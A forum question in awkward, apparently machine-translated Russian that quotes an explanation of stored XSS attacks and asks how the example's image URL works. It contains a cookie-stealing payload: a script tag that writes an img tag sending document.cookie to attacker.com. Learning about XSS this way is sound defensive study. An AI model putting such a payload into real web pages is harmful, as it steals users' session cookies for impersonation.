Цитируется по http://xss -proxy.sourceforge.net / Advanced_XSS_Control.txt :
Как многие здесь, вероятно, знают, текущие атаки XSS обычно бывают двух видов:
1. Атакующий загружает теги на общедоступную доску объявлений, в блог или на другой сайт, который
имеет уязвимость XSS, которую посетят многие другие пользователи. Атакующий нормально
собирает файлы cookie сайта для последующей олицетворения пользователя, но форма отправляет и другие атаки
иногда используются. Это то, о чем я думаю, многие XSS.
Вот пример:
Кто-то разместит на evilblog.com следующее, что другие пользователи обработают
<script>document.write("<img src=http://attacker.com/” + document.cookie + “>”)</script>
Это попыталось бы получить изображение с сервера злоумышленника с помощью evilblog пользователя.
куки в URL.
Мой вопрос:
Я не понимаю цель / результат URL-адреса изображения , написанного выше. Кто-нибудь может подробнее рассказать об этом?
PS: Что это значит для «Это попытается получить изображение с сервера злоумышленника с помощью cookie-файлов пользователя evilblog в URL»